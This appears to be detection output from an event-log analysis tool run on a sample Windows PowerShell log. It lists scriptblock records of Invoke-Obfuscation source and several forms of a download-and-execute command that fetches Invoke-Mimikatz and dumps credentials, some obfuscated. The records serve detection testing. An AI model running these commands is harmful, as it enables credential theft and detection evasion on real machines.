+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. '((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. '((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:56.683 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:56.745 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_.ModuleType -eq 'Manifest'},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:16:05.348 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:16:32.699 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_[1].Trim()},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:16:32.703 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:16:32.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace($_,'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:16:37.997 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:39.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:47.492 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:57.725 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:01.084 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".((Gv '*mDR*').nAmE[3,11,2]-jOiN'')((('IEX (New'+'-Ob'+'jec'+'t Net.WebClient).DownloadString({0}ht'+'tps://'+'raw.git'+'hubus'+'ercontent.com/mattifest'+'ation/Po'+'werSploit/ma'+'st'+'er/Exfil'+'t'+'r'+'ati'+'on/Invoke'+'-Mimika'+'t'+'z'+'.ps1{'+'0}); Inv'+'oke-'+'Mi'+'m'+'ikat'+'z -Dum'+'p'+'Creds') -f[cHaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:19.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:44.958 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $PsHome[4]+$pshOME[34]+'X') ((((""{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{10}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{31}{85}{88}{72}{25}{63}{32}{5}{39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{79}{20}{11}{59}{45}{17}{24}{84}{33}{21}{48}{71}{18}{23}{16}{28}{29}{80}{74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55}{8}"" -f'r','tiyJa','Ja','a*mDR*yJa).nAmE','it/ma','tyJ','IEX (New','ient)',')) ','CredsyJa','a','-M','dSt','J','3,11','J','nvyJa','t','yJa0','.D','keyJa+yJa','yJa+yJ','-ObyJa+','}); I','yJa','yJatps://yJa','aercontent.com','yJ','+','yJaoke-yJa+','ma','i','gi','z','+','+','Ja','yJa+y','myJa','a+yJahub',',2]-jOiNyJayJ','ebCl','/','at Ne','t.W','Ja+yJa','usyJa+','ty','a.ps1','yJa+yJaa','ow','Jas','DumyJa+yJa','yJa','Ja','cHaR]39','a+yJaer/','yJ',') -f[','imikay','ecyJ','pyJa+','ikaty','+yJaraw.','.','yJ','xfilyJa+yJatyJa+','a)(((yJa','nloa','Jaz -','yJa+y','{yJa+','}htyJa+','a+yJaat','yJa+y','ion/','sty','ttife','Ja+y','aon/Invo','yJaMi','+y','PoyJa','yJar','+yJa','ng({','+yJawerSplo','yJaj','0','E','((Gv yJ','[')) -cRepLAce ([ChaR]121+[ChaR]74+[ChaR]97),[ChaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:50.150 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
